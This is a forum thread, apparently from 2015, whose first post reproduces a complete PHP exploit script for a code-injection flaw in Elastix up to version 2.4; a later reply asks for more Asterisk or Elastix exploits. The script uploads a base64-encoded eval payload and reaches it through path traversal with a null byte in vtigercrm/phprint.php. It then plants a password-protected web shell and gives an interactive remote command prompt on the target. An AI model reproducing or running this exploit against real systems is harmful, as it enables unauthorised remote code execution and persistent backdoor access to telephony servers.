a.linm Posted September 6, 2015 Report Posted September 6, 2015 <?echo "n+-------------------------------------------+n";echo "| Elastix <= 2.4 |n";echo "| PHP Code Injection Exploit |n";echo "| By i-Hmx |n";echo "| sec4ever.com |n";echo "| n0p1337@gmail.com |n";echo "+-------------------------------------------+n";echo "n| Enter Target [https://ip] # ";$target=trim(fgets(STDIN));$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo=")); ?>';$faf=fopen("fa.txt","w+");fwrite($faf,$inj);fclose($faf);$myf='fa.txt';$url = $target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00"; // URL$reffer = "http://1337s.cc/index.php";$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";$cookie_file_path = "/";echo "| Injecting 1st payloadn";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_USERAGENT, $agent);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_REFERER, $reffer);curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);$result = curl_exec($ch);curl_close($ch);//echo $result;echo "| Injecting 2nd payloadn";function faget($url,$post){$curl=curl_init();curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl, CURLOPT_POSTFIELDS,$post);curl_setopt($curl, CURLOPT_COOKIEFILE, '/');curl_setopt($curl, CURLOPT_COOKIEJAR, '/');curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);curl_setopt($curl,CURLOPT_TIMEOUT,20);curl_setopt($curl, CURLOPT_HEADER, true);$exec=curl_exec($curl);curl_close($curl);return $exec;}function kastr($string, $start, $end){$string = " ".$string;$ini = strpos($string,$start);if ($ini == 0) return "";$ini += strlen($start);$len = strpos($string,$end,$ini) - $ini;return substr($string,$ini,$len);}$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");echo "| Testing total payloadn";$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");if(!eregi("Faris on the mic :D",$total)){die("[+] Exploitation Failedn");}echo "| Sending CMD test packagen";$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");if(!eregi("farsawy",$cmd)){echo " + Cmd couldn't executed but we can evaluate php coden + use : $target//vtigercrm/fa.phpn Post : fa=base64coden";}echo "| sec4ever shell online ;)nn";$host=str_replace('https://','',$target);while(1){echo "i-Hmx@$host# ";$c=trim(fgets(STDIN));if($c=='exit'){die("[+] Terminatingn");}$payload=base64_encode("passthru('$c');");$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");$done=kastr($fuck,"-----------------","-----------------");echo "$donen";}/*I dont even remember when i exploited this shit!maybe on 2013?!whatever , Hope its not sold as 0day in the near future xDD*/?>https://cxsecurity.com/issue/WLB-2015090035 Quote
mafimuskilas Posted October 15, 2015 Report Posted October 15, 2015 does anybody have to share an exploit asterisk or elastix ? i would appreciate it... thanks Quote